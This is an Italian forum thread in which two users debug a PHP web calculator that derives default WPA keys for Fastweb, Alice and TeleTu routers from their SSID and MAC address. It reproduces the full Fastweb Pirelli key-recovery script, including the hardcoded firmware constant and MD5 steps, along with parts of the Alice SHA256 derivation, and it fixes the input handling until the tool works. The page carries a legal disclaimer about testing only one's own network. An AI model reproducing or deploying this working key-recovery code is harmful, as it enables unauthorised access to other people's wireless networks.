Script PHP per testare sicurezza Wifi

[Mattia]

Devi modificare lo script per i router di Alice sostituendo:

Codice PHP:

/* 
 * SSID della rete.
 */
$SSID       = "Alice-96154825";
/*
 * MAC address del router.
 */
$MAC        = "\x00\x23\x8E\x01\x02\x03"; 


Con:

Codice PHP:

/* 
 * SSID della rete.
 */
$SSID       = isset($_POST['sid']) && is_string($_POST['sid']) ? $_POST['sid'] : '';
/*
 * MAC address del router.
 */
$MAC        = isset($_POST['mac']) && is_string($_POST['mac']) ? $_POST['mac'] : ''; 


Puoi cancellare il file "calcolo.php", visto che hai inserito il suo codice all'interno del file principale.

[Chandler]

in ogni caso il msg di risposta me lo da su un'altra pagina, nonostante io abbia rimosso

Codice:

echo "WPA : $wpa\n";

e in qualsiasi prova io abbia fatto mi ha dato sempre questo msg di risposta

La serie 'Alice-******' non è presente nella tabella e non è supportata.

[Mattia]

Cosa intendi su un'altra pagina? Il form dentro al tab dei router Alice non punta alla stessa pagina?
Se ti dà sempre il messaggio "La serie 'Alice-******' non è presente nella tabella e non è supportata.", credo che semplicemente lo script non supporti i dati dei router che gli hai inviato.

[Chandler]

prova direttamente da qui per capire cosa intendo...
spero di aver sbagliato sempre il seriale dei router...ma mi vien da pensare che forse è un problema di tabelle. QUI uno script per estendere le tabelle

[Chandler]

Tra l'altro sei riuscito a vedere lo script teletu?? si può capire cosa non va?
Infine ho provato a generare una wpa di ftsw*b ma il risultato non è corretto...mi chiedo se sia legato alla tipologia di router o a qualche altro fattore

Saluti

[Mattia]

Per quanto riguarda i risultati degli script, non so se sia una mancanza di quegli script.
Quando esce il messaggio "La serie 'Alice-******' non è presente nella tabella e non è supportata.", si blocca perché il messaggio viene stampato utilizzando la funzione die.

[Chandler]

Quindi in questo caso lo si lascia in questo modo?? o si riesce a stampare anche il msg di errore sotto "wpa"??
In QUESTO calcolatore online il risultato è corretto (e cita come codice sorgente lo stesso utilizzato da noi...) quindi mi chiedo cosa ci sia che non va con questo...

p.s. hai visto lo script teletu??

[Mattia]

Potresti sostituire:

Codice PHP:

die( "La serie 'Alice-$id******' non è presente nella tabella e non è supportata.\n" ); 


Con:

Codice PHP:

return false; 


E poi sostituire:

Codice PHP:

/*
 * Calcolo SHA256( MagicN + SN + MAC )
 */
$hash       = SHA256( $ALIS.$SN.$MAC );
/*
 * Converto la stringa dell'hash in un array di byte.
 */
$bytes      = hash2bytes($hash);
/*
 * Trovo la WPA utilizzando i primi 24 byte dell'hash come indici della tabella di covnersione.
 */
$wpa   = "";
for( $i = 0; $i < 24; $i++ ){
    $wpa .= $CONV_TABLE[ $bytes[$i] ];
} 


Con:

Codice PHP:

if ($SN) {
    /*
     * Calcolo SHA256( MagicN + SN + MAC )
     */
    $hash       = SHA256( $ALIS.$SN.$MAC );
    /*
     * Converto la stringa dell'hash in un array di byte.
     */
    $bytes      = hash2bytes($hash);
    /*
     * Trovo la WPA utilizzando i primi 24 byte dell'hash come indici della tabella di covnersione.
     */
    $wpa   = "";
    for( $i = 0; $i < 24; $i++ ){
        $wpa .= $CONV_TABLE[ $bytes[$i] ];
    }
} else {
    $wpa = 'La serie \'Alice-'.$id.'******\' non è presente nella tabella e non è supportata.';
} 


Non ho visto lo script per i router di TeleTu, perché dò aiuto gratuito solo sul form.

P.S.: Domani parto, quindi per una settimana non potrò aiutarti.

[Chandler]

Mi da un errore:

Parse error: syntax error, unexpected T_STRING in /membri/aiele/wifi/alice.php on line 73

la riga 73 corrisponde a

Codice:

wpa = 'La serie 'Alice-$id******' non è presente nella tabella e non è supportata.';

Grazie mille, cmq, per quello che hai fatto fin ora

Ci sentiamo settimana prossima

[Mattia]

Forse hai copiato lo script troppo in fretta!
Ho poi modificato il messaggio correggendo l'errore che ti è uscito.

[Chandler]

eheheheh effettivamente adesso funziona! Grazie
Hai idea di quale possa essere il problema del risultato di Fast*b rispetto al calcolatore online che ti ho linkato prima??

[Chandler]

Ho fatto prove diverse con SSID diversi per fastw*b ma ottengo sempre lo stesso risultato: 6c6201676e
Per quello di alice ho provato diversi SSID (anche quelli di prova che vengono spiegati nell'algo, ovvero 96154825 o 96140044) di vario tipo, ma mi da sempre il solito errore!!
C'è qualcosa che sicuramente non funziona!

[Mattia]

Dando un'occhiata veloce agli script non saprei quale potrebbe essere il problema. Assegni correttamente i valori che arrivano dal form alle variabili utilizzate negli script?

[Chandler]

Credo di si... il codice lo hai visto no?? quindi dovresti dirmelo tu

[Mattia]

Per quanto riguarda lo script di Alice, se hai fatto le modifiche che ti ho spiegato in questo messaggio, non so cos'altro suggerirti.
Lo stesso vale per lo script di Fastweb; il messaggio con le modifiche da fare è questo.

[Chandler]

Ho fatto le modifiche spiegate nei messaggi... nel caso di fastweb il file si chiama fastweb.php e quindi ho modificato index così:

Codice:

<?
    switch (isset($_POST['router']) ? $_POST['router'] : null) {
        case 'fastweb':
        //Script per il router di Fastweb
        include('fastweb.php');
        break;
        case 'alice':
            //Script per il router di Alice
        include('alice.php');
        break;
        case 'teletu':
            //Script per il router di Teletu
        include('teletu.php');
        break;
        case 'vodafone':
            //Script per il router di Vodafone
        break;
        default:
    //Messaggio di errore per non aver scelto uno dei due router
    echo 'Non hai scelto nessun operatore, riprova';
    }

?>
<html>
<head>
    <meta charset="utf-8">
    <title>Wifi Security Test</title>
    <link rel="stylesheet" href="css/jquery.ui.all.css">
    <script src="js/jquery-1.8.0.js"></script>
    <script src="js/jquery.ui.core.js"></script>
    <script src="js/jquery.ui.widget.js"></script>
    <script src="../../ui/jquery.ui.tabs.js"></script>
    <link rel="stylesheet" href="../demos.css">
    <script>
    $(function() {
        $( "#tabs" ).tabs({
            event: "mouseover"
        });
    });
    </script>
</head>
<body>
<div class="demo">
    <div id="tabs">
        <ul>
            <li><a href="#tabs-1">Fastweb</a></li>
            <li><a href="#tabs-2">Alice</a></li>
            <li><a href="#tabs-3">Teletu</a></li>
            <li><a href="#tabs-4">Vodafone</a></li>
        </ul>
        <div id="tabs-1">
            <form action="index.php" method="post">
                <input type="hidden" name="router" value="fastweb" />
                <p>FASTWEB -1- <input class="input" type="fastweb" value name="sid" placeholder="Inserisci SSID" onfocus="if (this.placeholder=='Inserisci SSID') this.placeholder = ''" onblur="if (this.placeholder!=this.defaultplaceholder) this.placeholder = 'Inserisci SSID'" size="20"></p>
                <input class="input" type="submit" value="Calcola" size="20"><br>
            </form>
            <p>WPA: </p>
<?php
if (isset($_POST['router']) && $_POST['router'] == 'fastweb' && isset($wpa)) {
    echo $wpa;
}
?>
        </div>
        <div id="tabs-2">
            <form action="index.php" method="post">
                <input type="hidden" name="router" value="alice" />
                <p>ALICE - <input class="input" type="alice" value name="sid" placeholder="Inserisci SSID" onfocus="if (this.placeholder=='Inserisci SSID') this.placeholder = ''" onblur="if (this.placeholder!=this.defaultplaceholder) this.placeholder = 'Inserisci SSID'" size="20"><br>
                MAC address <input class="input" type="mac" value name="mac" placeholder="(Es. 001122334455)" onfocus="if (this.placeholder=='(Es. 001122334455)') this.placeholder = ''" onblur="if (this.placeholder!=this.defaultplaceholder) this.placeholder = '(Es. 001122334455)'" size="20"></p>
                <input class="input" type="submit" value="Calcola" size="20"><br>
            </form>
            <p>WPA: </p>
<?php
if (isset($_POST['router']) && $_POST['router'] == 'alice' && isset($wpa)) {
    echo $wpa;
}
?>
        </div>
        <div id="tabs-3">
            <form action="index.php" method="post">
                <input type="hidden" name="router" value="teletu" />
                <p>TELETU/TELE2 - <input class="input" type="teletu" value name="sid" placeholder="Inserisci SSID" onfocus="if (this.placeholder=='Inserisci SSID') this.placeholder = ''" onblur="if (this.placeholder!=this.defaultplaceholder) this.placeholder = 'Inserisci SSID'" size="20"><br>
                MAC address <input class="input" type="mac" value name="mac" placeholder="(Es. 001122334455)" onfocus="if (this.placeholder=='(Es. 001122334455)') this.placeholder = ''" onblur="if (this.placeholder!=this.defaultplaceholder) this.placeholder = '(Es. 001122334455)'" size="20"></p>
                <input class="input" type="submit" value="Calcola" size="20"><br>
            </form>
            <p>WPA: </p>
<?php
if (isset($_POST['router']) && $_POST['router'] == 'teletu' && isset($wpa)) {
    echo $wpa;
}
?>
        </div>
        <div id="tabs-4">
            <p>WORK IN PROGRESS</p>
        </div>
    </div>
</div>
<p style="text-align:center;">L&acute;accesso abusivo ad un sistema informatico o telematico &egrave; un reato perseguibile a termine di legge (art. 615-ter c.p.). La detenzione e la diffusione abusiva di codici di accesso a sistemi informatici o telematici &egrave; un reato penale perseguibile secondo la legge 615.<br>
L&acute;utilizzo di quanto esposto &egrave; da riferirsi a un test di sicurezza sulla propria rete o su una rete di cui il proprietario abbia espressamente dato il libero consenso al fine di giudicarne la sicurezza e porre rimedio ad eventuali vulnerabilit&agrave;.</p>
</body>
</html>

mentre in fastweb.pho ho modificato $ssid e rimosso print "WPA : $wpa\n";
Nel caso di Alice ho seguito alla lettera quello che mi hai detto! L'unica cosa che ricordo di aver fatto ad intuito è stato di rimuovere:

Codice:

echo "WPA : $wpa\n";

ho sbagliato??

[Mattia]

Hai fatto tutto correttamente. Prova a inserire all'inizio del file:

Codice PHP:

var_dump($_POST); 


Cosa stampa quando invii il form?

[Chandler]

Questo:

array(2) { ["router"]=> string(7) "fastweb" ["sid"]=> string(12) "38XX9DXX0FXX" }

[Mattia]

I dati vengano spediti correttamente. A questo punto non saprei proprio cosa potrebbe essere sbagliato. Forse semplicemente quegli script calcolano correttamente un range diverso di SID rispetto a quelli che hai inserito tu.

[Chandler]

eh no, perchè come ti ho già detto in QUESTO messaggio, ho trovato un calcolatore online che usa lo stesso algoritmo (preso dallo stesso sito) e li il calcolo dellos tesso SSID lo svolge correttamente!!
Tra l'altro ti ho già segnalato anche che qualsiasi SSID inserisca nel mio calcolatore il risultato è sempre lo stesso, ovvero: 6c6201676e

[Mattia]

Allora non saprei proprio quale potrebbe essere il problema.

[Chandler]

beh, sicuramente deve essere una svista... potevo capire se l'algo fastw*b generava dei risultati diversi (anche se non corretti)...ma visto che da sempre lo stesso risultato (questo stramaledetto 6c6201676e ) vuol dire che l'algo non funzia!! Ci sta sfuggendo qualcosa...

[Mattia]

Pubblica tutto il codice dello script per Fastweb così com'è ora, altrimenti non saprei come aiutarti.

[Chandler]

ecco qui:

Codice:

<?php
/***************************************************************************
*   FastWeb Pirelli WPA Discovery                                         *
*   by evilsocket - evilsocket@gmail.com - http://www.evilsocket.net      *
*                                                                         *
*   This program is free software; you can redistribute it and/or modify  *
*   it under the terms of the GNU General Public License as published by  *
*   the Free Software Foundation; either version 2 of the License, or     *
*   (at your option) any later version.                                   *
*                                                                         *
*   This program is distributed in the hope that it will be useful,       *
*   but WITHOUT ANY WARRANTY; without even the implied warranty of        *
*   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the         *
*   GNU General Public License for more details.                          *
*                                                                         *
*   You should have received a copy of the GNU General Public License     *
*   along with this program; if not, write to the                         *
*   Free Software Foundation, Inc.,                                       *
*   59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.             *
***************************************************************************/

/*
* SSID di partenza.
*/
$ssid   = $_POST['sid'];
/*
* 20 byte costanti cablati nel firmware dei Pirelli Fastweb.
*/
$seq_20 = "\x22\x33\x11\x34\x02\x81\xFA\x22\x11\x41\x68\x11\x12\x01\x05\x22\x71\x42\x10\x66";
/*
* Prelevo la parte finale del SSID.
*/
$sn     = split( '-', $ssid );
$sn     = $sn[2];
/*
* La divido in gruppi di due caratteri, formando un array
* di 6 rappresentazioni esadecimali di byte.
*/
preg_match_all( "/[a-f0-9]{2}/i", $sn, $sn_bytes );
$sn_bytes = $sn_bytes[0];
/*
* Inizializzo una stringa con il valore intero di questi byte.
*/
$str = "";
for( $i = 0; $i < 6; $i++ ){
    $str .= chr( hexdec( $sn_bytes[$i] ) );
}
echo "$str\n";

/*
* Aggiungo alla stringa i 20 byte "magici".
*/
$str .= $seq_20;
/*
* Ricavo i byte dell'hash md5 della stringa
*/
preg_match_all( "/[a-f0-9]{2}/i", md5($str), $md5_bytes );
$md5_bytes = $md5_bytes[0];
$long      = "";
/*
* Converto i byte in sequenze binarie di 8 bit.
*/
foreach( $md5_bytes as $byte ){
    $long .= sprintf( "%08s", decbin( hexdec($byte) ) );
}
/*
* Divido in 5 gruppi di 5 bit ognuno e, qual'ora il valore intero
* di un gruppo sia maggiore di 0x0a, aggiungo 0x57.
*/
$hex_5 = array();
for( $i = 0; $i < 25; $i += 5 ){
    $n       = bindec( substr( $long, $i, 5 ) );
    $hex_5[] = $n > 0x0a ? $n + 0x57 : $n;
}
/*
* Compongo la chiave.
*/
$wpa = "";
foreach( $hex_5 as $hex ){
    $wpa .= sprintf( "%02x", $hex );
}


?>

[Mattia]

Lo script è corretto, però ho visto che nell'esempio dello script originale inserisce il SSID "FASTWEB-1-00193EA1B2C3". Nel campo del form inserisci il SSID in questo formato o ne inserisci solo una parte? Prova a inserire questo SSID e verifica cosa restituisce.

[Chandler]

sempre "6c6201676e"!!
Nel campo del form inserisco solo la parte dopo "FASTWEB-1-"

[Mattia]

Il problema è proprio quello! Lo script accetta solo i SSID in quel formato.
Prova a inserire come SSID "FASTWEB-1-6c6201676e" e verifica cosa ti restituisce.

[Chandler]

effettivamente così funziona...ma non dovrebbe funzionare così!!
Non si può modificare lo script affinchè faccia il calcolo escludendo "fastweb-1-"??
Il calcolatore online che ti ho linkato qualche msg fa, fa così...eppure usa lo stesso algo...

[Mattia]

Sicuramente hanno modificato lo script per accettare il SSID in quel formato. Per accettare entrambi i formati, puoi modificare questa riga:

Codice PHP:

$ssid   = $_POST['sid']; 


Con questa:

Codice PHP:

$ssid = strtoupper(substr($_POST['sid'], 0, 10)) == 'FASTWEB-1-' ? $_POST['sid'] : 'FASTWEB-1-'.$_POST['sid']; 


[Chandler]

Perfect!! Adess funziona perfettamente!!
Ma come faccio ad evitare che in alto stampi:

array(2) { ["router"]=> string(7) "fastweb" ["sid"]=> string(12) "XXXXXX"

oppure:

array(0) { } Non hai scelto nessun operatore, riprova

se rimuovo

Codice:

var_dump($_POST);

(cosa che ho fatto), vengono COMUNQUE stampati:
il msg di errore "Non hai scelto nessun operatore, riprova" al primo accesso
e strani caratteri dopo il calcolo

---

A questo punto penso che lo stesso discorso valga per alice.. bisognerà rimuovere "Alice-" dal SSID...
Cmq grazie di tutto